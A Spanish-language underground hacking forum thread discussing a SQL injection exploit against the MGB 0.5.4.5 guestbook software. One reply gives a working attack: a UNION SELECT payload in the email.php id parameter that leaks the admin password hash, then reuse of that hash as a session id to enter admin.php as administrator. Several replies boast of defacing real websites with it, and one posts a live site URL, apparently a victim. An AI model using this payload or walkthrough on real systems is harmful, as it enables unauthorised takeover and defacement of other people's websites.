Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Julio 09, 2008, 11:04:58
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX  (Leído 1567 veces)
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2024


foro.new-bytes.net


Ver Perfil WWW
« en: Enero 19, 2007, 02:20:26 »
En línea

http://foro.new-bytes.net
Elros Yavetil
Miembro
*****
Desconectado Desconectado

Mensajes: 39


Ver Perfil Email
« Respuesta #1 en: Marzo 15, 2007, 12:31:39 »
dice que window lo reconcoe como comando interno el perl :S
« Última modificación: Marzo 15, 2007, 12:54:12 por Elros Yavetil » En línea
r.u.b.i.o
Habitual
*****
Desconectado Desconectado

Mensajes: 344


Rahma Naoarak O'al

seba.lpda@gmail.com
Ver Perfil Email
« Respuesta #2 en: Marzo 15, 2007, 02:42:58 »
Cita de: Elros Yavetil en Marzo 15, 2007, 12:31:39
dice que window lo reconcoe como comando interno el perl :S

XD tenes que tener instalado el Active Perl para interpretar xD, o sino doy otra alternativa para  usar esta sql inyection :

Una vez que encuentran una pagina vulnerable, vas a donde dice CONTACT.



EN la barra de direcciones, podemos ver un tal "email.php?id=admin" , eso lo reemplazamos por "email.php?id=1%20UNION%20SELECT%20null,passwort%20FROM%20mgb_settings%20--"  SIN COMILLAS y le damos enter...

EN la pagina q se abre. podemos distinguir que cambio de lo que antes decia "Write an email to Admin" a "Write an email to c68485e252b120534397e32099101d63"



Este es el resultado de la SQL Inyection ... ese codigo lo copian..

En la barra de direcciones, borramos todo desde email.php , escribimos esto: admin.php?sid=<aca pegamos el codigo>

Nos quedaria asi:
Código:
http://<url>/<directorio del foro>/admin.php?sid=<codigo del sql inyection>

LISTO , le damos enter y ya estamos como admins...  Evil
En línea
Elros Yavetil
Miembro
*****
Desconectado Desconectado

Mensajes: 39


Ver Perfil Email
« Respuesta #3 en: Marzo 15, 2007, 03:37:00 »
gracias... ya me va!!!! HICE MI PRIMER DEFACINGGG weee.... Cheesy gracias por ayudarme, ya soy feliz... Cheesy ojala hubiese manuales cm estos... WOWOWOWO!!!:D
En línea
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2024


foro.new-bytes.net


Ver Perfil WWW
« Respuesta #4 en: Marzo 15, 2007, 03:41:43 »
Cheesy
En línea

http://foro.new-bytes.net
Elros Yavetil
Miembro
*****
Desconectado Desconectado

Mensajes: 39


Ver Perfil Email
« Respuesta #5 en: Marzo 15, 2007, 03:54:27 »
En línea
maber
Miembro
*****
Desconectado Desconectado

Mensajes: 20


La vida no tiene sentido,hay que darselo


Ver Perfil Email
« Respuesta #6 en: Marzo 18, 2007, 03:38:35 »
me gusta me gusta
En línea
SokalT
Miembro
*****
Desconectado Desconectado

Mensajes: 36



Ver Perfil Email
« Respuesta #7 en: Marzo 25, 2007, 03:57:44 »
Yay alfin me salio desfacear me tardo mucho porke no sabia manejar el cmd pero lo hice y defacie como 5 paginas Evil Evil
En línea
rody216
Miembro
*****
Desconectado Desconectado

Mensajes: 20


Ver Perfil
« Respuesta #8 en: Marzo 25, 2007, 09:02:26 »
me pongo a practicar para aprender thanks bye
En línea
~Rik~Style~
Habitual
*****
Desconectado Desconectado

Mensajes: 308


La Vida Es Facil Toma Decisiones Y No Mires Atras


Ver Perfil
« Respuesta #9 en: Mayo 27, 2007, 07:13:49 »
http://rasilion.ra.funpic.de/Gaestebuch/guestbook.php


Jajajaja Gracias Ozx

 Muy Buen manual Como Siempre Te Lo Curras :p Ke Seria De Nosotros Sin Ti

Salu2
~Rik~Style~
En línea
ek_col
Visitante
« Respuesta #10 en: Agosto 16, 2007, 11:17:37 »
TENIA QUE SER OZX

Ya me acostumbre a ver que siempre sacas buenos post......buenos?...nooo...buenisimos, creeme que esta info la estaba buscando y lo que encotraba me confundia mas, ahora entiendo, gracias.

 palmas  palmas  palmas  palmas  palmas

Seria genial que las  personas compartieran mas con el foro.
En línea
.bAcKdOoR.
Recien Llegado
*
Desconectado Desconectado

Mensajes: 5



Ver Perfil Email
« Respuesta #11 en: Enero 11, 2008, 07:11:21 »
wena ozx!

oie compile y too..
pero al cargar me sale

connected y too el atao..
y al final.

Exploit Failed!

ke onda¿

= trate con la otra forma mediante "contacto" me dio el hash pero al "guarda cambios"
y lo logre...

Gracias1
« Última modificación: Enero 11, 2008, 07:26:22 por .bAcKdOoR. » En línea


Chile =)
Black_Jack21
Recien Llegado
*
Desconectado Desconectado

Mensajes: 14


H4ck 15 5h4r3 1nf0rm4t10n


Ver Perfil Email
« Respuesta #12 en: Junio 08, 2008, 08:55:58 »
exelente articulo Shocked
En línea
Flori4n
Recien Llegado
*
Desconectado Desconectado

Mensajes: 2


Ver Perfil Email
« Respuesta #13 en: Junio 18, 2008, 06:58:00 »
merci Afro
En línea
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC